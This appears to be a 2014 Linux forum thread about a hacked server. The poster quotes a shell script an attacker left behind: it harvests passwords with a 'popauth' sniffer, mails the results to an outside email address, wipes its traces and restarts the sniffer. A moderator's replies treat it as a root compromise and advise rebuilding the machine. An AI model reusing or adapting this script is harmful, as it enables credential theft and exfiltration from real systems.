LinuxQuestions.org
Share your knowledge at the LQ Wiki.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 06-06-2014, 04:07 PM   #1
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Rep: Reputation: Disabled
SSH Hack - IptabLes & IptabLex


My server was recently attached with a bot here is a file left behind.

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test #This part, the output to test, they were able to uncover all users passwords including "roots"
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail deathface2007@yahoo.com -s "$(hostname -f)" < test #Left his email address behind
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A


I was able to lock down ssh in /etc/ssh/sshd_config, and remove and kill of the processes and files from the hacker

But cron is not working now:

# service crond restart
Stopping crond: 0G[;31mFAILED;39m]
Starting crond: execvp: No such file or directory
0G[;31mFAILED;39m]

I tired re-loading rpm's but it still will not run. The hacker seems to have done something to kill cron.

Any Idea's of what i can do?

Also, is there a way to remove cron all together so I can reload it altogether?

Last edited by T-Dub116; 06-06-2014 at 04:10 PM.
 
Old 06-06-2014, 04:55 PM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529
Quote:
Originally Posted by T-Dub116 View Post
Any Idea's of what i can do?
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?
 
Old 06-09-2014, 08:00 AM   #3
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn View Post
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?


My customer, runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install"

---------- Post added 06-09-14 at 08:01 AM ----------

Quote:
Originally Posted by unSpawn View Post
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?
Do you have any ideas for me on getting Cron working?
 
Old 06-09-2014, 09:52 AM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529
Quote:
Originally Posted by T-Dub116 View Post
My customer, runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install"
First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords of private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.
 
Old 06-10-2014, 10:40 AM   #5
T-Dub116
Member
 
Registered: Aug 2013
Location: Dolyestown
Posts: 88

Original Poster
Rep: Reputation: Disabled
Quote:
Originally Posted by unSpawn View Post
First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords of private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.


Thanks for trying to help, but I found another online form that is helping to solving my problem.
 
Old 06-10-2014, 04:16 PM   #6
JeremyBoden
Member
 
Registered: Nov 2011
Posts: 938

Rep: Reputation: 174Reputation: 174
I doubt it.
 
Old 06-11-2014, 10:07 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,331
Blog Entries: 55

Rep: Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529Reputation: 3529
Quote:
Originally Posted by T-Dub116 View Post
(..) I found another online form that is helping to solving my problem.
I'm sure you have.


For anyone else: should you want to check then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you best get Rootkit Hunter from CVS until released officially.
 
  


Reply

Tags
iptablex


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
IPTABLES, SSH & OpenVPN doni49 Linux - Networking 1 06-15-2013 10:21 PM
ssh port & iptables uk.engr Linux - Newbie 1 10-13-2012 04:17 PM
iptables & ssh Richtown Linux - Networking 8 05-09-2007 12:53 PM
iptables & ssh Tezdread Linux - Networking 26 03-12-2003 04:01 AM
iptables & inbound ftp, ssh bddwyer Linux - Networking 3 02-06-2003 10:27 AM


All times are GMT -5. The time now is 09:56 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration